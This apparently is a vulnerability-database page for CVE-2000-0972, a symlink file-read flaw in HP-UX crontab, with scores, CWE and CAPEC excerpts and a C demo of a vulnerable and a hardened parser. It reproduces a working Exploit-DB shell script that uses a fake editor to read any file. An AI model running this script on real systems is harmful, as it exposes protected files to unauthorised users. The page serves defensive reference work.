CVE-2000-0972
Published 2000-12-19
Priority: P4 (14) · CVSS 3.1: 5.5 (Medium) · CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Exploit: available · EPSS: 1.28% (66.5th percentile)
HP-UX 11.00 crontab allows local users to read arbitrary files via the -e option by creating a symlink to the target file during the crontab session, quitting the session, and reading the error messages that crontab generates.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | hp-ux | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 5.5 | MEDIUM | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N |
| nvd | 2.0 | 2.1 | LOW | AV:L/AC:L/Au:N/C:P/I:N/A:N |
No detection rules found.
Exploit-DB
HP-UX 11.00/10.20 crontab - Overwrite Files (exploitdb · 2000-11-19 · CVE-2000-0972)
---
#!/bin/sh
#
# HP-UX 11.00/10.20 crontab
#
# Kyong-won,Cho
#
# [email protected]
#
# Usage : ./crontab.sh <file-to-read>
#
if [ -z "$1" ]
then
echo "Usage : $0 <file-to-read>"
exit 1
fi
# Fake editor. crontab -e hands it the scratch file as its argument (the
# editor's $1, written as \$1 so the here-document leaves it alone); it
# replaces that file with a symlink to the target, which is this script's
# $1 and is expanded when the here-document is written.
cat > /tmp/crontab_exp << _EOF_
#!/bin/sh
ln -sf $1 \$1
_EOF_
chmod 755 /tmp/crontab_exp
EDITOR=/tmp/crontab_exp
export EDITOR
# After the editor exits, crontab reopens the scratch file by name, follows
# the symlink, fails to parse the target and echoes each offending line to
# stderr followed by "error on previous line".
crontab -e 2> /tmp/crontab$$
# Strip the error markers; what is left is the contents of the target file.
grep -v "error on previous line" /tmp/crontab$$
rm -f /tmp/crontab_exp /tmp/crontab$$
# milw0rm.com [2000-11-19]
Exploit-DB
HP-UX 10.20/11.0 - crontab '/tmp' File (exploitdb · 2000-10-20 · CVE-2000-0972)
---
source: https://www.securityfocus.com/bid/1845/info
crontab is a binary in the cron package of the HP-UX cron implementation which allows a user to create a file of scheduled commands. A vulnerability in crontab exists that allows a user to read any file on an HP-UX system. crontab as implemented with HP-UX is an access-controlled binary. Users are permitted to run crontab only if they have an access entry in the crontab.allow file.
To create a crontab, a user must execute the command "crontab -e." Executing this command launches the vi editor, creates a file in the /tmp directory with the ownership delegated to the user running the command. While the file exists in /tmp, the owner of the file may spawn a shell from vi and create a symbolic lin
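The sequence the two Exploit-DB entries describe (a scratch file handed to $EDITOR, swapped for a symlink while the editor runs, its target then echoed back in crontab's parse errors) as an added example that is not from the page, from Exploit-DB or from HP: a C model of the vulnerable reopen-by-name-and-echo pattern next to a hardened version. The file names under /tmp, the "secret" line with its marker, and the six-field validity rule are constructed for the demo; the hardened checks (O_NOFOLLOW, fstat for a regular file owned by the caller with a single link, error messages that carry only a line number) are the standard mitigations for this class of bug, not a reconstruction of HP's actual patch.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed stand-in for a root-only file; the marker lets us detect
 * whether its contents reached the parser's error output. */
static const char SECRET_LINE[] = "root:CONSTRUCTED_SECRET_MARKER:0:0:::\n";

/* Create a demo file from a mkstemp template; body NULL means empty (the
 * scratch file crontab -e would hand to $EDITOR). Demo paths only. */
static int make_file(char *path, size_t len, const char *tmpl, const char *body) {
    snprintf(path, len, "%s", tmpl);
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    size_t n = body ? strlen(body) : 0;
    int ok = n == 0 || write(fd, body, n) == (ssize_t)n;
    close(fd);
    return ok ? 0 : -1;
}

/* The exploit's fake $EDITOR: replace the scratch file with a symlink. */
static int attacker_editor(const char *scratch, const char *target) {
    unlink(scratch);
    return symlink(target, scratch);
}

/* Demo rule: a crontab line needs at least six whitespace-separated fields. */
static int line_is_valid(const char *line) {
    int fields = 0, in_field = 0;
    for (const char *p = line; *p; p++) {
        if (*p == ' ' || *p == '\t' || *p == '\n') in_field = 0;
        else if (!in_field) { in_field = 1; fields++; }
    }
    return fields >= 6;
}

/* Append text to err, stopping cleanly when the buffer is full. */
static void append(char *err, size_t errlen, size_t *used, const char *text) {
    if (*used >= errlen) return;
    int n = snprintf(err + *used, errlen - *used, "%s", text);
    *used = (n < 0 || (size_t)n >= errlen - *used) ? errlen : *used + (size_t)n;
}

/* Vulnerable pattern: reopen the scratch file by name after the editor
 * exits (fopen follows the symlink) and echo each rejected line followed
 * by "error on previous line", the wording the exploit filters on. */
int parse_vulnerable(const char *scratch, char *err, size_t errlen) {
    err[0] = '\0';
    FILE *f = fopen(scratch, "r");
    if (!f) return -1;
    char line[512];
    size_t used = 0;
    int bad = 0;
    while (fgets(line, sizeof line, f)) {
        if (line_is_valid(line)) continue;
        bad++;
        append(err, errlen, &used, line);                     /* leaks the target's text */
        append(err, errlen, &used, "error on previous line\n");
    }
    fclose(f);
    return bad;
}

/* Hardened pattern: never follow a link, insist on a regular file owned by
 * the caller with one link, and report only a line number on error. */
int parse_hardened(const char *scratch, char *err, size_t errlen) {
    err[0] = '\0';
    int fd = open(scratch, O_RDONLY | O_NOFOLLOW);          /* ELOOP if it is a symlink */
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != getuid() || st.st_nlink != 1) {       /* also rejects a hard link */
        close(fd);
        return -1;
    }
    FILE *f = fdopen(fd, "r");
    if (!f) { close(fd); return -1; }
    char line[512], msg[64];
    size_t used = 0;
    int bad = 0, lineno = 0;
    while (fgets(line, sizeof line, f)) {
        lineno++;
        if (line_is_valid(line)) continue;
        bad++;
        snprintf(msg, sizeof msg, "line %d: syntax error\n", lineno);  /* no file contents */
        append(err, errlen, &used, msg);
    }
    fclose(f);
    return bad;
}

/* Run the full crontab -e scenario against one parser; returns the parser's
 * result and leaves what it would have written to stderr in err. */
static int run_scenario(int (*parse)(const char *, char *, size_t), char *err, size_t errlen) {
    char secret[64], scratch[64];
    if (make_file(secret, sizeof secret, "/tmp/secret_demo_XXXXXX", SECRET_LINE) < 0) return -2;
    if (make_file(scratch, sizeof scratch, "/tmp/crontab_demo_XXXXXX", NULL) < 0) { unlink(secret); return -2; }
    int rc = attacker_editor(scratch, secret) == 0 ? parse(scratch, err, errlen) : -2;
    unlink(scratch);
    unlink(secret);
    return rc;
}

int run_vulnerable(char *err, size_t errlen) { return run_scenario(parse_vulnerable, err, errlen); }
int run_hardened(char *err, size_t errlen) { return run_scenario(parse_hardened, err, errlen); }

int main(void) {
    char err[1024];
    printf("vulnerable: rc=%d\n%s", run_vulnerable(err, sizeof err), err);
    printf("hardened:   rc=%d\n%s", run_hardened(err, sizeof err), err);
    return 0;
}
```

The vulnerable path returns one rejected line and its error buffer contains the marker from the secret file; the hardened path returns -1 before reading anything because O_NOFOLLOW refuses the symlink. Pinning st_dev/st_ino to the values recorded at creation would catch the swap too, but it breaks with editors that save by writing a new file and renaming it over the old one, which is why the check above looks at the file's type, owner and link count instead. Fixing the error message is a separate, independent mitigation: even an unprivileged reader of a root-owned file should never see that file's lines echoed back.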
No writeups or analysis indexed.
CAPEC
[HIGH] CAPEC-27: Leveraging Race Conditions via Symbolic Links (mitre_capec)
This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to them. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file they will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.
Execution Flow:
S
CWE
Improper Link Resolution Before File Access ('Link Following')
mitre_cwe
CWE-59 Improper Link Resolution Before File Access ('Link Following')
CWE-59: Improper Link Resolution Before File Access ('Link Following')
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.
Background: Soft links are a UNIX term that is synonymous with simple shortcuts on Windows-based platforms.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Confidentiality, Integrity, Access Control. Impact: Read Files or Directories, Modify Files or Directories, Bypass Protection Mechanism. An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpe
CWE
CWE-61: UNIX Symbolic Link (Symlink) Following (mitre_cwe)
The product, when opening a file or directory, does not sufficiently account for when the file is a symbolic link that resolves to a target outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.
A product that allows UNIX symbolic links (symlink) as part of paths whether in internal code or through user input can allow an attacker to spoof the symbolic link and traverse the file system to unintended locations or access arbitrary files. The symbolic link can permit an attacker to read/write/corrupt a file that they originally did not have permissions to access.
Modes of Introduction:
Phase: Implementation
Note: These are typically reported for temporary files or privileged